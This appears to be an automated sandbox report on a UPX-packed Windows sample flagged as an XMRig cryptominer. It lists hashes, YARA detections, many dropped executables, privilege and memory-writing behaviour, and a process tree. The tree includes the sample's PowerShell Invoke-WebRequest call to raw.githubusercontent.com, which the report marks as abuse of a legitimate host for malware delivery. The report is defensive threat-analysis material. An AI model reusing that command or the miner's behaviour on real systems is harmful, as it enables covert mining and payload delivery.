xmrig | e032ffc4f9438f3745fb4d24cafabc67709a6c1d4fa0b046a5b8f5a40f00adc0

Analysis

max time kernel
96s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2024, 14:36 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9f9578fa827e4bef85e1ff3ffc7a7500N.exe
Size

2.0MB
MD5

9f9578fa827e4bef85e1ff3ffc7a7500
SHA1

3e3709f427b6052e516b05ceb5fafec62c27b8f4
SHA256

e032ffc4f9438f3745fb4d24cafabc67709a6c1d4fa0b046a5b8f5a40f00adc0
SHA512

0c2f6bb098472bd21e9e2d1c37caab29def0e8fb99fac74affc2bfaf176fa9dfacb615af472cb2a00d4194cdcf29c32ae9c20a314edc5cd07777dc61015387da
SSDEEP

49152:Lz071uv4BPMkibTIA5EAR24GuSps7EMpWYUNs:NABY

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 49 IoCs

miner

resource	yara_rule
behavioral2/memory/2168-64-0x00007FF76DC40000-0x00007FF76E032000-memory.dmp	xmrig
behavioral2/memory/5020-72-0x00007FF67AD90000-0x00007FF67B182000-memory.dmp	xmrig
behavioral2/memory/4960-77-0x00007FF69D140000-0x00007FF69D532000-memory.dmp	xmrig
behavioral2/memory/3036-118-0x00007FF71FDC0000-0x00007FF7201B2000-memory.dmp	xmrig
behavioral2/memory/4964-285-0x00007FF7B0480000-0x00007FF7B0872000-memory.dmp	xmrig
behavioral2/memory/1788-287-0x00007FF6174A0000-0x00007FF617892000-memory.dmp	xmrig
behavioral2/memory/1340-291-0x00007FF70C310000-0x00007FF70C702000-memory.dmp	xmrig
behavioral2/memory/2904-299-0x00007FF7BE510000-0x00007FF7BE902000-memory.dmp	xmrig
behavioral2/memory/4876-308-0x00007FF6DD8E0000-0x00007FF6DDCD2000-memory.dmp	xmrig
behavioral2/memory/1908-309-0x00007FF775CC0000-0x00007FF7760B2000-memory.dmp	xmrig
behavioral2/memory/4016-307-0x00007FF676D00000-0x00007FF6770F2000-memory.dmp	xmrig
behavioral2/memory/4008-304-0x00007FF622910000-0x00007FF622D02000-memory.dmp	xmrig
behavioral2/memory/4132-296-0x00007FF7C6F40000-0x00007FF7C7332000-memory.dmp	xmrig
behavioral2/memory/536-290-0x00007FF7B3520000-0x00007FF7B3912000-memory.dmp	xmrig
behavioral2/memory/1680-289-0x00007FF6B46A0000-0x00007FF6B4A92000-memory.dmp	xmrig
behavioral2/memory/3036-1980-0x00007FF71FDC0000-0x00007FF7201B2000-memory.dmp	xmrig
behavioral2/memory/4292-2003-0x00007FF79D9E0000-0x00007FF79DDD2000-memory.dmp	xmrig
behavioral2/memory/3156-125-0x00007FF64F8D0000-0x00007FF64FCC2000-memory.dmp	xmrig
behavioral2/memory/208-120-0x00007FF651390000-0x00007FF651782000-memory.dmp	xmrig
behavioral2/memory/2292-119-0x00007FF60C7E0000-0x00007FF60CBD2000-memory.dmp	xmrig
behavioral2/memory/1944-104-0x00007FF6FA140000-0x00007FF6FA532000-memory.dmp	xmrig
behavioral2/memory/4380-96-0x00007FF7781C0000-0x00007FF7785B2000-memory.dmp	xmrig
behavioral2/memory/3092-90-0x00007FF6CE9C0000-0x00007FF6CEDB2000-memory.dmp	xmrig
behavioral2/memory/744-83-0x00007FF75F9D0000-0x00007FF75FDC2000-memory.dmp	xmrig
behavioral2/memory/244-78-0x00007FF7C2D80000-0x00007FF7C3172000-memory.dmp	xmrig
behavioral2/memory/2168-2005-0x00007FF76DC40000-0x00007FF76E032000-memory.dmp	xmrig
behavioral2/memory/2292-2007-0x00007FF60C7E0000-0x00007FF60CBD2000-memory.dmp	xmrig
behavioral2/memory/208-2011-0x00007FF651390000-0x00007FF651782000-memory.dmp	xmrig
behavioral2/memory/4960-2013-0x00007FF69D140000-0x00007FF69D532000-memory.dmp	xmrig
behavioral2/memory/5020-2009-0x00007FF67AD90000-0x00007FF67B182000-memory.dmp	xmrig
behavioral2/memory/744-2015-0x00007FF75F9D0000-0x00007FF75FDC2000-memory.dmp	xmrig
behavioral2/memory/3092-2017-0x00007FF6CE9C0000-0x00007FF6CEDB2000-memory.dmp	xmrig
behavioral2/memory/3156-2021-0x00007FF64F8D0000-0x00007FF64FCC2000-memory.dmp	xmrig
behavioral2/memory/4380-2020-0x00007FF7781C0000-0x00007FF7785B2000-memory.dmp	xmrig
behavioral2/memory/244-2023-0x00007FF7C2D80000-0x00007FF7C3172000-memory.dmp	xmrig
behavioral2/memory/1788-2033-0x00007FF6174A0000-0x00007FF617892000-memory.dmp	xmrig
behavioral2/memory/4292-2037-0x00007FF79D9E0000-0x00007FF79DDD2000-memory.dmp	xmrig
behavioral2/memory/3036-2039-0x00007FF71FDC0000-0x00007FF7201B2000-memory.dmp	xmrig
behavioral2/memory/1340-2035-0x00007FF70C310000-0x00007FF70C702000-memory.dmp	xmrig
behavioral2/memory/536-2030-0x00007FF7B3520000-0x00007FF7B3912000-memory.dmp	xmrig
behavioral2/memory/1944-2028-0x00007FF6FA140000-0x00007FF6FA532000-memory.dmp	xmrig
behavioral2/memory/4964-2025-0x00007FF7B0480000-0x00007FF7B0872000-memory.dmp	xmrig
behavioral2/memory/1680-2032-0x00007FF6B46A0000-0x00007FF6B4A92000-memory.dmp	xmrig
behavioral2/memory/4132-2043-0x00007FF7C6F40000-0x00007FF7C7332000-memory.dmp	xmrig
behavioral2/memory/4876-2041-0x00007FF6DD8E0000-0x00007FF6DDCD2000-memory.dmp	xmrig
behavioral2/memory/1908-2045-0x00007FF775CC0000-0x00007FF7760B2000-memory.dmp	xmrig
behavioral2/memory/2904-2047-0x00007FF7BE510000-0x00007FF7BE902000-memory.dmp	xmrig
behavioral2/memory/4008-2049-0x00007FF622910000-0x00007FF622D02000-memory.dmp	xmrig
behavioral2/memory/4016-2051-0x00007FF676D00000-0x00007FF6770F2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1948	powershell.exe
5	1948	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1948	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2292	NQjItOg.exe
2168	vMyJvsB.exe
5020	dJdmyyf.exe
4960	yOJvudl.exe
208	LUfSWzM.exe
244	rCKXhRg.exe
744	yzsdSwM.exe
3092	oOSnadL.exe
4380	bwAIRmX.exe
3156	LQFhTzv.exe
1944	gUXtGIn.exe
4964	JllbCnP.exe
1788	WeBijJa.exe
1680	VTDfzhp.exe
536	vpLpgQN.exe
1340	REjzxZW.exe
4292	pNZexpB.exe
3036	KGVdosM.exe
4132	iBAtvue.exe
4876	kWjGVMJ.exe
1908	GlCHkIu.exe
2904	uJqYbTj.exe
4008	pLOdtPh.exe
4016	xpmCtPD.exe
2224	wLctvSi.exe
1800	AcJyFtu.exe
3220	bFfuHcd.exe
64	SNdsQaC.exe
3224	lYliapG.exe
1520	BPIXOYC.exe
3280	RmrFger.exe
1384	IEqAqms.exe
2872	FtMMnkm.exe
1700	uVLmWMn.exe
4936	bkNZAAz.exe
3492	JhqpZCE.exe
1128	zFNEDxp.exe
4788	oKSdMii.exe
3612	WFYFPYt.exe
4416	OWWAjmu.exe
4772	TvixZYE.exe
4848	kttMGfN.exe
2040	yZlZmlD.exe
1812	KkzDOGA.exe
1368	LstJvtQ.exe
1696	kUvqQwX.exe
3396	ZLvYbkC.exe
564	ZzKQNGZ.exe
4764	cqKdgkJ.exe
844	RIUtCWU.exe
2156	WFbEOYp.exe
1496	vKapqfv.exe
1572	DDjUNrs.exe
3992	KxLdtNi.exe
5088	XOxNvwn.exe
1984	kyXKdzH.exe
2648	zbdQVXZ.exe
1104	bHzmrtm.exe
4400	nIjISVb.exe
3260	aqOHJRx.exe
4820	zrXQxTf.exe
4156	xvEXhIF.exe
2232	fzcgMAq.exe
1856	WXnvsFc.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2432-0-0x00007FF78D8D0000-0x00007FF78DCC2000-memory.dmp	upx
behavioral2/files/0x00080000000234c0-10.dat	upx
behavioral2/files/0x00070000000234c4-23.dat	upx
behavioral2/files/0x00070000000234c8-35.dat	upx
behavioral2/files/0x00070000000234cc-48.dat	upx
behavioral2/files/0x00070000000234ca-57.dat	upx
behavioral2/memory/2168-64-0x00007FF76DC40000-0x00007FF76E032000-memory.dmp	upx
behavioral2/memory/5020-72-0x00007FF67AD90000-0x00007FF67B182000-memory.dmp	upx
behavioral2/memory/4960-77-0x00007FF69D140000-0x00007FF69D532000-memory.dmp	upx
behavioral2/files/0x00070000000234ce-79.dat	upx
behavioral2/files/0x00070000000234d2-101.dat	upx
behavioral2/files/0x00070000000234d1-100.dat	upx
behavioral2/files/0x00070000000234d3-114.dat	upx
behavioral2/memory/3036-118-0x00007FF71FDC0000-0x00007FF7201B2000-memory.dmp	upx
behavioral2/files/0x00070000000234d5-126.dat	upx
behavioral2/files/0x00070000000234d6-133.dat	upx
behavioral2/files/0x00070000000234d7-145.dat	upx
behavioral2/files/0x00070000000234da-160.dat	upx
behavioral2/files/0x00070000000234db-165.dat	upx
behavioral2/memory/4964-285-0x00007FF7B0480000-0x00007FF7B0872000-memory.dmp	upx
behavioral2/memory/1788-287-0x00007FF6174A0000-0x00007FF617892000-memory.dmp	upx
behavioral2/memory/1340-291-0x00007FF70C310000-0x00007FF70C702000-memory.dmp	upx
behavioral2/memory/2904-299-0x00007FF7BE510000-0x00007FF7BE902000-memory.dmp	upx
behavioral2/memory/4876-308-0x00007FF6DD8E0000-0x00007FF6DDCD2000-memory.dmp	upx
behavioral2/memory/1908-309-0x00007FF775CC0000-0x00007FF7760B2000-memory.dmp	upx
behavioral2/memory/4016-307-0x00007FF676D00000-0x00007FF6770F2000-memory.dmp	upx
behavioral2/memory/4008-304-0x00007FF622910000-0x00007FF622D02000-memory.dmp	upx
behavioral2/memory/4132-296-0x00007FF7C6F40000-0x00007FF7C7332000-memory.dmp	upx
behavioral2/memory/536-290-0x00007FF7B3520000-0x00007FF7B3912000-memory.dmp	upx
behavioral2/memory/1680-289-0x00007FF6B46A0000-0x00007FF6B4A92000-memory.dmp	upx
behavioral2/memory/3036-1980-0x00007FF71FDC0000-0x00007FF7201B2000-memory.dmp	upx
behavioral2/memory/4292-2003-0x00007FF79D9E0000-0x00007FF79DDD2000-memory.dmp	upx
behavioral2/files/0x00070000000234e1-189.dat	upx
behavioral2/files/0x00070000000234df-185.dat	upx
behavioral2/files/0x00070000000234e0-184.dat	upx
behavioral2/files/0x00070000000234de-180.dat	upx
behavioral2/files/0x00070000000234dd-175.dat	upx
behavioral2/files/0x00070000000234dc-170.dat	upx
behavioral2/files/0x00070000000234d9-155.dat	upx
behavioral2/files/0x00070000000234d8-150.dat	upx
behavioral2/files/0x00080000000234c1-142.dat	upx
behavioral2/memory/3156-125-0x00007FF64F8D0000-0x00007FF64FCC2000-memory.dmp	upx
behavioral2/files/0x00070000000234d4-121.dat	upx
behavioral2/memory/208-120-0x00007FF651390000-0x00007FF651782000-memory.dmp	upx
behavioral2/memory/2292-119-0x00007FF60C7E0000-0x00007FF60CBD2000-memory.dmp	upx
behavioral2/memory/4292-115-0x00007FF79D9E0000-0x00007FF79DDD2000-memory.dmp	upx
behavioral2/files/0x00070000000234d0-105.dat	upx
behavioral2/memory/1944-104-0x00007FF6FA140000-0x00007FF6FA532000-memory.dmp	upx
behavioral2/files/0x00070000000234cf-103.dat	upx
behavioral2/memory/4380-96-0x00007FF7781C0000-0x00007FF7785B2000-memory.dmp	upx
behavioral2/memory/3092-90-0x00007FF6CE9C0000-0x00007FF6CEDB2000-memory.dmp	upx
behavioral2/files/0x00070000000234cd-84.dat	upx
behavioral2/memory/744-83-0x00007FF75F9D0000-0x00007FF75FDC2000-memory.dmp	upx
behavioral2/memory/244-78-0x00007FF7C2D80000-0x00007FF7C3172000-memory.dmp	upx
behavioral2/files/0x00080000000234c5-76.dat	upx
behavioral2/files/0x00080000000234c6-66.dat	upx
behavioral2/files/0x00070000000234cb-63.dat	upx
behavioral2/files/0x00070000000234c9-55.dat	upx
behavioral2/files/0x00070000000234c7-50.dat	upx
behavioral2/files/0x00080000000234bd-7.dat	upx
behavioral2/memory/2168-2005-0x00007FF76DC40000-0x00007FF76E032000-memory.dmp	upx
behavioral2/memory/2292-2007-0x00007FF60C7E0000-0x00007FF60CBD2000-memory.dmp	upx
behavioral2/memory/208-2011-0x00007FF651390000-0x00007FF651782000-memory.dmp	upx
behavioral2/memory/4960-2013-0x00007FF69D140000-0x00007FF69D532000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\qVmghyc.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\hRPnwQO.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\GnYYJDd.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\aYiBaRq.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\iRbTveF.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\AhzbVAP.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\AEIdiuh.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\RSDiAJA.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\iBAtvue.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\vnxGuLt.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\soTsaQW.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\iduXrHd.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\dDVGnyc.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\AkJkupg.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\yVHkTJN.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\svnLpGA.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\aqOHJRx.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\JvOYjjT.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\iySoKbR.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\DOseHGx.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\gKGVUSI.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\qriAodu.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\ElcazTf.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\RLKkUtL.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\uxcOStR.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\KODLZSW.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\VnJLdIA.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\KXlQhPg.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\qHHgvwf.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\LstJvtQ.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\Ckunmgx.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\vDpzoFd.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\jmCIQEu.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\XOxNvwn.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\WngpoOs.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\IpWDSPf.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\gwPkOAD.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\AsFqgEf.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\yOJvudl.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\mujjmvG.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\kSTDNEp.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\QnauyRF.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\rCKXhRg.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\BojLjOe.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\cdIPCer.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\uQjAbnb.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\QqKdiSx.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\NzwRDHz.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\bFfuHcd.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\zbdQVXZ.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\AeRFKtN.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\dfDhmyW.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\OeaVLIx.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\ufrgGzC.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\kolEOCH.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\PEJOKvu.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\cePQHfh.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\lsrVMSL.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\ajqGaGv.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\DzgOLab.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\NQjItOg.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\SWuhjTh.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\yCzpZdR.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
File created	C:\Windows\System\sGatzTb.exe	9f9578fa827e4bef85e1ff3ffc7a7500N.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
Token: SeLockMemoryPrivilege	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe
Token: SeDebugPrivilege	1948	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 1948	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	85
PID 2432 wrote to memory of 1948	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	85
PID 2432 wrote to memory of 2292	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	86
PID 2432 wrote to memory of 2292	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	86
PID 2432 wrote to memory of 2168	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	87
PID 2432 wrote to memory of 2168	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	87
PID 2432 wrote to memory of 5020	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	88
PID 2432 wrote to memory of 5020	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	88
PID 2432 wrote to memory of 4960	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	89
PID 2432 wrote to memory of 4960	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	89
PID 2432 wrote to memory of 208	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	90
PID 2432 wrote to memory of 208	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	90
PID 2432 wrote to memory of 244	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	91
PID 2432 wrote to memory of 244	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	91
PID 2432 wrote to memory of 744	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	92
PID 2432 wrote to memory of 744	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	92
PID 2432 wrote to memory of 3092	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	93
PID 2432 wrote to memory of 3092	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	93
PID 2432 wrote to memory of 4380	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	94
PID 2432 wrote to memory of 4380	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	94
PID 2432 wrote to memory of 3156	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	95
PID 2432 wrote to memory of 3156	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	95
PID 2432 wrote to memory of 1944	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	96
PID 2432 wrote to memory of 1944	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	96
PID 2432 wrote to memory of 4964	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	97
PID 2432 wrote to memory of 4964	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	97
PID 2432 wrote to memory of 1788	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	98
PID 2432 wrote to memory of 1788	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	98
PID 2432 wrote to memory of 1680	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	99
PID 2432 wrote to memory of 1680	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	99
PID 2432 wrote to memory of 536	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	100
PID 2432 wrote to memory of 536	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	100
PID 2432 wrote to memory of 1340	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	101
PID 2432 wrote to memory of 1340	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	101
PID 2432 wrote to memory of 4292	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	102
PID 2432 wrote to memory of 4292	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	102
PID 2432 wrote to memory of 3036	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	103
PID 2432 wrote to memory of 3036	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	103
PID 2432 wrote to memory of 4132	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	104
PID 2432 wrote to memory of 4132	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	104
PID 2432 wrote to memory of 4876	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	105
PID 2432 wrote to memory of 4876	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	105
PID 2432 wrote to memory of 2904	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	106
PID 2432 wrote to memory of 2904	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	106
PID 2432 wrote to memory of 1908	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	107
PID 2432 wrote to memory of 1908	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	107
PID 2432 wrote to memory of 4008	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	108
PID 2432 wrote to memory of 4008	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	108
PID 2432 wrote to memory of 4016	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	109
PID 2432 wrote to memory of 4016	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	109
PID 2432 wrote to memory of 2224	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	110
PID 2432 wrote to memory of 2224	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	110
PID 2432 wrote to memory of 1800	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	111
PID 2432 wrote to memory of 1800	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	111
PID 2432 wrote to memory of 3220	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	112
PID 2432 wrote to memory of 3220	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	112
PID 2432 wrote to memory of 64	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	113
PID 2432 wrote to memory of 64	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	113
PID 2432 wrote to memory of 3224	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	114
PID 2432 wrote to memory of 3224	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	114
PID 2432 wrote to memory of 1520	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	115
PID 2432 wrote to memory of 1520	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	115
PID 2432 wrote to memory of 3280	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	116
PID 2432 wrote to memory of 3280	2432	9f9578fa827e4bef85e1ff3ffc7a7500N.exe	116

C:\Users\Admin\AppData\Local\Temp\9f9578fa827e4bef85e1ff3ffc7a7500N.exe
"C:\Users\Admin\AppData\Local\Temp\9f9578fa827e4bef85e1ff3ffc7a7500N.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\System\NQjItOg.exe
  C:\Windows\System\NQjItOg.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\vMyJvsB.exe
  C:\Windows\System\vMyJvsB.exe
  2⤵
  - Executes dropped EXE
  PID:2168
- C:\Windows\System\dJdmyyf.exe
  C:\Windows\System\dJdmyyf.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\yOJvudl.exe
  C:\Windows\System\yOJvudl.exe
  2⤵
  - Executes dropped EXE
  PID:4960
- C:\Windows\System\LUfSWzM.exe
  C:\Windows\System\LUfSWzM.exe
  2⤵
  - Executes dropped EXE
  PID:208
- C:\Windows\System\rCKXhRg.exe
  C:\Windows\System\rCKXhRg.exe
  2⤵
  - Executes dropped EXE
  PID:244
- C:\Windows\System\yzsdSwM.exe
  C:\Windows\System\yzsdSwM.exe
  2⤵
  - Executes dropped EXE
  PID:744
- C:\Windows\System\oOSnadL.exe
  C:\Windows\System\oOSnadL.exe
  2⤵
  - Executes dropped EXE
  PID:3092
- C:\Windows\System\bwAIRmX.exe
  C:\Windows\System\bwAIRmX.exe
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Windows\System\LQFhTzv.exe
  C:\Windows\System\LQFhTzv.exe
  2⤵
  - Executes dropped EXE
  PID:3156
- C:\Windows\System\gUXtGIn.exe
  C:\Windows\System\gUXtGIn.exe
  2⤵
  - Executes dropped EXE
  PID:1944
- C:\Windows\System\JllbCnP.exe
  C:\Windows\System\JllbCnP.exe
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\Windows\System\WeBijJa.exe
  C:\Windows\System\WeBijJa.exe
  2⤵
  - Executes dropped EXE
  PID:1788
- C:\Windows\System\VTDfzhp.exe
  C:\Windows\System\VTDfzhp.exe
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\Windows\System\vpLpgQN.exe
  C:\Windows\System\vpLpgQN.exe
  2⤵
  - Executes dropped EXE
  PID:536
- C:\Windows\System\REjzxZW.exe
  C:\Windows\System\REjzxZW.exe
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Windows\System\pNZexpB.exe
  C:\Windows\System\pNZexpB.exe
  2⤵
  - Executes dropped EXE
  PID:4292
- C:\Windows\System\KGVdosM.exe
  C:\Windows\System\KGVdosM.exe
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Windows\System\iBAtvue.exe
  C:\Windows\System\iBAtvue.exe
  2⤵
  - Executes dropped EXE
  PID:4132
